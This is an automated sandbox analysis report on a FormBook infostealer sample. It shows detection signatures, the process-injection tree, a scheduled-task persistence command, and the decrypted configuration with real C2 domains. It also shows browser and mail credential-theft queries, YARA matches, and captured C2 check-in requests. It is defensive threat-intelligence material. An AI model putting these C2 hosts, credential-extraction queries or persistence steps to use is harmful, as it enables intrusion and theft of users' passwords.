
Analysis Report J0OmHIagw8.exe

Overview

General Information

Sample Name: J0OmHIagw8.exe
Analysis ID: 339323
MD5: 92ff500a693078263908c83b4b290481
SHA1: fa5dcc6012c71490efdf320791a90c7a18958a95
SHA256: 767b1b32d4ac4cec73967590ca5b28c3e0f4d709c0773e3f4021774f15a2483a
Tags: exe, Formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Tries to download HTTP data from a sinkholed server
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • J0OmHIagw8.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\J0OmHIagw8.exe' MD5: 92FF500A693078263908C83B4B290481)
    • schtasks.exe (PID: 5856 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 4116 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
    • vbc.exe (PID: 5800 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 3448 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 5864 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", 
"0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", 
".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "slgacha.com", "oohdough.com", "6983ylc.com", "aykassociate.com", "latin-hotspot.com", "starrockindia.com", "beamsubway.com", "queensboutique1000.com", "madbaddie.com", "bhoomimart.com", "ankitparivar.com", "aldanasanchezmx.com", "citest1597669833.com", "cristianofreitas.com", "myplantus.com", "counterfeitmilk.com", "8xf39.com", "pregnantwomens.com", "yyyut6.com", "stnanguo.com", "fessusesefsee.com", "logansshop.net", "familydalmatianhomes.com", "accessible.legal", "epicmassiveconcepts.com", "indianfactopedia.com", "exit-divorce.com", "colliapse.com", "nosishop.com", "hayat-aljowaily.com", "soundon.events", "previnacovid19-br.com", "traptlongview.com", "splendidhotelspa.com", "masterzushop.com", "ednevents.com", "studentdividers.com", "treningi-enduro.com", "hostingcoaster.com", "gourmetgroceriesfast.com", "thesouthbeachlife.com", "teemergin.com", "fixmygearfast.com", "arb-invest.com", "shemaledreamz.com", "1819apparel.com", "thedigitalsatyam.com", "alparmuhendislik.com", "distinctmusicproductions.com", "procreditexpert.com", "insights4innovation.com", "jzbtl.com", "1033325.com", "sorteocamper.info", "scheherazadelegault.com", "glowportraiture.com", "cleitstaapps.com", "globepublishers.com", "stattests.com", "brainandbodystrengthcoach.com", "magenx2.info", 
"escaparati.com", "wood-decor24.com", "travelnetafrica.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.herbmedia.net/csv8/\u0000"]}

Yara Overview

Memory Dumps

Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 5.2.vbc.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 5.2.vbc.exe.400000.0.unpack
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 5.2.vbc.exe.400000.0.unpack
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C

Source: 5.2.vbc.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 5.2.vbc.exe.400000.0.raw.unpack
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\J0OmHIagw8.exe', ParentImage: C:\Users\user\Desktop\J0OmHIagw8.exe, ParentProcessId: 5816, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', ProcessId: 5856

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT, Avira URL Cloud: Label: phishing
Source: http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT, Avira URL Cloud: Label: malware
Found malware configuration
Source: 5.2.vbc.exe.400000.0.unpack, Malware Configuration Extractor: FormBook (the extracted configuration is listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: J0OmHIagw8.exe, Virustotal: Detection: 31%
Yara detected FormBook
Source: Yara match, File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: J0OmHIagw8.exe, Joe Sandbox ML: detected
Source: 5.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: J0OmHIagw8.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: J0OmHIagw8.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
Source: Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
Source: Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic, Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49755
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic, Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49771
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
Tries to download HTTP data from a sinkholed server
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Jan 2021 20:16:25 GMT | Server: X-SinkHole: Malware DNS SinkHole Server | Content-Length: 307 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Jan 2021 20:17:53 GMT | Server: X-SinkHole: Malware DNS SinkHole Server | Content-Length: 307 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1 | Host: www.travelnetafrica.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1 | Host: www.fessusesefsee.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1 | Host: www.queensboutique1000.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1 | Host: www.studentdividers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1 | Host: www.logansshop.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
